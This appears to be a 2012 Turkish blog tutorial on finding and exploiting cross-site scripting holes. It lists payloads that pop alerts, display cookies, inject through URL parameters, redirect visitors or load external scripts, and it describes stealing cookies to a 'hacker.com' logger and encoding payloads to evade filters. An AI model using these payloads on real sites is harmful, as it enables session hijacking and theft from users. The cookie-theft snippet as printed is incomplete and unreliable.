22 Mayıs 2012 Salı

XSS Açığını Tespit Etmek Bulmak




   
Kullanıcılardan veri beklenen alanlara aşağıda belirtilen kodların gönderilmesi XSS web yazılımlarında XSS açıklarının tespit edilmesini sağlayacaktır.


1.
Kod:

<script>alert(’XSS’)</script>

Bir uyarı mesajı çıkartarak içinde XSS yazılmasını sağlayan Javascript kodudur.

     Orjinal Boyutunda Açmak İçin ( 1061x317 ) Buraya Tıklayın


Saldırgan bu şekilde veri girişine izin verilen web yazılımlarına zararlı kod göndererek XSS açığını tespit edebilir.

2.
Kod:

<script      src=http://www.site.com></script>

XSS açığından faydalanarak web yazılımı ziyaret eden kullanıcılara başka bir site üzerindeki zararlı kodu yükleyebilir.

3.
Kod:

<script>alert (document.cookie);</script>

Web yazılımının çerez bilgisinin ekran uyarı kutusu içinde görüntülenmesini sağlar.

4. XSS Açığı ile Çerez Çalma: Çerezler (Cookie) zayıf http protokolünün oturum durumunun kontrolünü ve kimlik doğrulamayı sağlayan zayıf bileşenleridir.Saldırgan eğer sayfayı ziyaret eden kullanıcıların Çerez bilgisini okuyup kaydedebilirse kendi bilgileri ile yerlerini değiştirerek kurbanın yetkilerine ulaşabilir.Bu işlemi XSS açığı bulunan web yazılımını ziyaret eden herkesin Çerez bilgilerini başka bir web yazılımına kaydeden bir Javascript kodu göndererek gerçekleştirebilir.

Aşağıda belirtilen Javascript kodu sayfayı ziyaret eden kullanıcıların bilgilerini bir başka web yazılımına kaydedilmesini sağlamaktadır.

Kod:

<img src= "http://hacker.com/cgi-bin/spycoders.jpg">

ve saldırgan daha sonra bu XSS açığını kullanarak aldığı Çerez bilgilerini aşağıda belirtilen adresten okuyabilir ve kendi Çerez bilgileri ile değiştirebilir.

http://hacker.com/sniff/log.php

Bazı Çerez bilgileri içinde Kullanıcı adı ve şifre gibi önemli bilgilerin tutulduğunu düşünürsek XSS açıklarının ne kadar zararlı olabileceğini algılamış oluruz.Saldırgan elde ettiği bu bilgiler ile internet üzerinden kolayca ücretsiz bulabileceği Cookie Editor yazılımları ile kendi Çerez bilgilerini de kolayca değiştirerek kurbanın yetkilerine ulaşabilir.

5. XSS aöıkları URL üzerinden de test edilebilir.
6.
Kod:

http://www.kurban.com/members.php?id=<script>alert(’XSS’)</script>

Genelde XSS kodları <script>, <applet>, <object> ve <embed> kodları içinde web yazılımına gönderilir.

7.
Kod:

<script type="text/javascript">

<!--

windows.location="http://www.spycoders.com/"

//-->
</script>

Yukarıda belirtilen örnek Javascript kodu XSS açığı olan bu web sayfasına giren kullanıcıları www.spycoders.com sitesine yönlendirmektir.

8.
Kod:

<iframe src=http://www.spycoders.com <

Web sayfasının içinde başka bir çerçeve içinde www.spycoders.com adresine yönlendirme yapar.Bu şekilde saldırgan istediği zararlı kodu ActiveX ve benzeri yöntemler ile sistemlere bulaştırabilir.

9. Saldırganlar web yazılımlarındaki XSS zayıflıklarını tespit etmeye çalışırken web yazılımcıların olsa script girişlerini engellemek için kullandıkları yöntemleri anlamaya ve aşmaya çalışırlar.XSS saldırısını Evrensel Kod’a dönüştürmek saldırının maskelenmesini sağlayabilir.

Örneğin aşağıda bir XSS saldırı yöntemi ve onun Evrensel Kod’a dönüştürülmüş hali görüntülenmektedir.
Kod:

<script>alert(’XSS’)</script>

Evrensel Kod:



Evrensel Kod ancak böyle oldu çünkü otomatik olarak normal haline çeviriyor

Saldırganlar bu şekilde web yazılımcıların filtreleme yapabileceklerini düşünerek XSS saldırılarını farklı şekillerde web yazılımına göndermeye çalışırlar.

Okuduğunuz için teşekkürler

0 yorum:

Yorum Gönder